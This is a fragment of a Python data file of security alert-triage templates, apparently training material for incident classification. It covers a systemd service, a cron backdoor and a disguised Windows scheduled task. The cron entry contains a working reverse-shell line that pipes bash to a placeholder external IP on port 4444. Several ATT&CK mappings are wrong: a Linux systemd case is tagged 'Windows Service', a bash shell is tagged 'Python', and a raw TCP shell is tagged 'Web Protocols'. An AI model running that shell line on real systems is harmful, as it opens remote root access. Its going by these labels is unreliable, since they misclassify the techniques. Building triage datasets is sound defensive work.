     [("file_modification", "New unit file metric-collector.service written to /etc/systemd/system/", '{"path": "/etc/systemd/system/metric-collector.service"}'),
      ("process_creation", "sudo systemctl daemon-reload && sudo systemctl enable metric-collector", '{"cmd": "systemctl enable metric-collector"}')],
     [("New system daemon registered to persist across system boots on Linux server.", ["EVT-001", "EVT-002"], "medium")],
     "Systemd service modification by devops account requires confirmation against configuration management changelog.",
     [("T1543.003", "Windows Service", "Persistence", ["EVT-001", "EVT-002"])],
     [("Review contents of /etc/systemd/system/metric-collector.service and verify with DevOps team.", "medium", "Validate service unit.")], None),

    ("TF-031", "Linux Cron Job Backdoor", "persistence_mechanisms", "alert_triage", "confirmed_malicious", "train", None, "Linux", "server", "root",
     "Malicious Scheduled Cron Task Executing Reverse Shell", "critical", "Cron Backdoor",
     [("file_modification", "Hidden cron job created in /etc/cron.d/sync-check", '{"path": "/etc/cron.d/sync-check", "content": "* * * * * root /bin/bash -i >& /dev/tcp/{ext_ip}/4444 0>&1"}'),
      ("network_connection", "cron process spawned bash establishing outbound socket to {ext_ip}:4444", '{"dest_ip": "{ext_ip}", "port": 4444}'),
      ("process_creation", "CRON daemon executed child /bin/sh running netcat/bash reverse shell", '{"cmd": "/bin/bash -i"}')],
     [("Cron configuration file dropped into system directory containing one-minute reverse shell execution string.", ["EVT-001"], "high"),
      ("Active recurring network connection established to external IP {ext_ip} by cron daemon.", ["EVT-002", "EVT-003"], "critical")],
     "Unambiguous Linux persistence backdoor utilizing system cron daemon to maintain persistent remote root shell.",
     [("T1053.005", "Scheduled Task", "Persistence", ["EVT-001"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-002"]),
      ("T1059.006", "Python", "Execution", ["EVT-003"])],
     [("Remove /etc/cron.d/sync-check immediately and terminate active bash reverse shell PID.", "immediate", "Sever remote access."),
      ("Perform Linux root compromise audit across all servers sharing SSH credentials.", "immediate", "Check for lateral pivot.")], None),

    ("TF-032", "Scheduled Task Name Mismatch Missing Binary Hash", "persistence_mechanisms", "investigation_planning", "insufficient_evidence", "train", "likely_malicious_vs_insufficient_evidence", "Windows", "workstation", "employee01",
     "Task Scheduler Registered Deceptive Task Name without File Hash", "medium", "Task Verification Gap",
     [("scheduled_task", "Task 'GoogleUpdateTaskMachineUA' registered pointing to C:\\Users\\Public\\updater.exe", '{"task_name": "GoogleUpdateTaskMachineUA", "path": "C:\\\\Users\\\\Public\\\\updater.exe"}'),
      ("file_modification", "updater.exe created in C:\\Users\\Public but EDR failed to compute SHA256", '{"file": "updater.exe", "hash": null}')],
     [("Scheduled task masquerading under Google updater name points to unverified binary in Public folder.", ["EVT-001", "EVT-002"], "medium")],
     "Deceptive task name strongly suggests persistence masquerading, but missing file hash and execution logs leave binary intent unconfirmed.", [],
     [("Acquire binary C:\\Users\\Public\\updater.exe for sandbox analysis and compute cryptographic hash.", "high", "Verify payload character.")],
     ["File binary artifact C:\\Users\\Public\\updater.exe", "Task Scheduler XML definition in C:\\Windows\\System32\\Tasks"])
]

print(f"Chunk 1 loaded: {len(CHUNK_1)} templates.")
